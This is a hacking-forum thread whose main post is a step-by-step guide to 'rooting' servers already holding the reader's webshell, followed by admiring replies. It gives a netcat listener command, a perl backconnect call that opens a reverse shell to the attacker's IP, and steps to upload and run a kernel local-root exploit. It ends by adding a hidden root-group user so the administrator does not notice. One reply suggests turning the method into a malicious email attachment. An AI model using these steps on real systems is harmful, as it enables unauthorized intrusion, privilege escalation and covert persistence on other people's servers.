Server Rooting Tutorial
by ThePancake - December 26, 2017 at 05:02 AM
#1
What is rooting?

Rooting is process of exploiting the kernel to gain administrator(root) rights on servers.

Requirements: Backconnecting

First of all you will need an open port on your router inorder to backconnect. Information on port forwarding can be found HERE
Assuming you have an open port, open your command prompt cd to the netcat path and type: nc -lnvp 21
where 21 is the open port on your router. And it should be saying listening on [any] 21 ...

[Image: Dx55uGd.png]

Now navigate to your webshell command option and execute the perl backconnect script like: perl backconnect.pl YOURIP PORT
eg:perl backconnect.pl 225.45.6.6 21

[Image: U9sg7Ny.png]

If the backconnect was successful you should be seeing connect to [IPADDRESS] from (UNKNOWN) [IPADDRESS] on your comand prompt


[Image: rega97p.png]

Choosing/Finding Localroot Exploit

We will need a localroot exactly matching the kernel and year it's build. To check which version of kernel its using execute: uname -rv

[Image: MIudFMi.png]

In our case the kernal is 2.6.18-53.el5PAE #1 SMP Mon Nov 12 02:55:09 EST 2007 choose an exploit matching the kernal from here: [Priv8] Linux/BSD Localroot Exploits 2001 => 2014 if you can't find it in my collection google or lookup exploit databases.

Executing Localroot Exploit

Let's assume you found an exploit, upload the exploit to the server via webshell, wget or any other downloaders i've already placed my localroot in the folder /tmp/guest/

[Image: PvmZ8Af.png]

To make the file executable we give the Permission: chmod +x 2.6.18

Executing the file : ./2.6.18 (note the dot and forward slash)

To check if you have got root execute: whoami

If its says root you have successfully rooted the box

For automating this process of download and execute i've made a script:

Here

Adding New User

Now that we have gained root privileges we could just change the root password but admin will know so we add a new user with root privilages. The following command adds a new user on server named "r00t" you can change this to whatever you like: adduser -g 0 r00t -G wheel,sys,bin,daemon,adm,disk -d /r00t -s /bin/sh

[Image: MZ7g9ZL.png]

Now give a password for the user r00t:

passwd r00t
Enter a password, confirm it and you are done

Now you will be able to login via putty or any ssh client.
Reply
#2
Really clean and easy to read tutorial mate. Nice work. Sure this will come in handy for many people.
Reply
#3
Nice tutorial, well formatted and easy to follow. Smile
Reply
#4
Ah I was looking for a tutorial like that, thank you
Reply
#5
great use of reverse connect through priv escalation. For those that try this, it is worth running the auto script provided against an always on reverse proxy. The same concept can be used as a malicious payload in an email attachment.
Reply
#6
Netcat is such an amazing -and date I say- underestimated tool? Nice tut!
Reply
#7
Good share but only problem finding root exploit for it i mean priv ones.
Reply
#8
wow nice tutorial! clean af ty!
Reply
#9
The best tutorial i ever seen, i wish i knew this things earlier...
Reply
#10
Really in depth tutorial.
Reply
#11
It`s really cool, man! Thanks
Reply
#12
@[GOD] ThePancake: Nicely done, well documented nice bc script too
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
[MEGA LEAK] ⭐️⭐️✅⏩$400/Day Spaming Full Tutorial and TOOLS WORKING OCTOBER 2019⏪✅⭐️⭐️ hyipposter 6 1,998 January 27, 2020 at 08:01 AM
Last Post: matyyseek
WPS-PIN.10.8 [WPA Wi-Fi Networks WPA2-PSK Hack] (NEW SIMPLE METHOD) + Tutorial Johnmatew 1 5,362 January 22, 2020 at 06:15 AM
Last Post: willistrong
[Tutorial] Get BitDefender Premium FOREVER reststop 4 357 January 12, 2020 at 01:19 AM
Last Post: nzt

 Users browsing this thread: 1 Guest(s)